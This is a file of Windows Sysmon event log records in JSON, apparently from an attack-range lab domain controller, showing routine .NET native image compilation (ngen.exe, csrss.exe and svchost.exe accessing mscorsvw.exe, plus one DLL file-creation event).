{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7710,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2262-5F25-0000-001064420E00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2262-5F25-0000-001064420E00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:16","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:16.319\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-0010CBB30E00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:16.319","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-0010CBB30E00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:18.100\r\nProcessGuid: {41C8662E-2278-5F25-0000-0010CBB30E00}\r\nProcessId: 2996\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb4-0\\System.Data.Linq.dll\r\nCreationUtcTime: 2020-08-01 08:06:18.100","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:18.100","ProcessGuid":"{41C8662E-2278-5F25-0000-0010CBB30E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb4-0\\System.Data.Linq.dll","CreationUtcTime":"2020-08-01 08:06:18.100","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.178\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001091010D00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.178","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001091010D00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.178\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001091010D00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.178","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001091010D00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.178\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001091010D00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.178","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001091010D00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.288\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227A-5F25-0000-00101ABC0E00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.288","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227A-5F25-0000-00101ABC0E00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.288\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227A-5F25-0000-00101ABC0E00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.288","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227A-5F25-0000-00101ABC0E00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:18.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227A-5F25-0000-00101ABC0E00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:18.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227A-5F25-0000-00101ABC0E00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
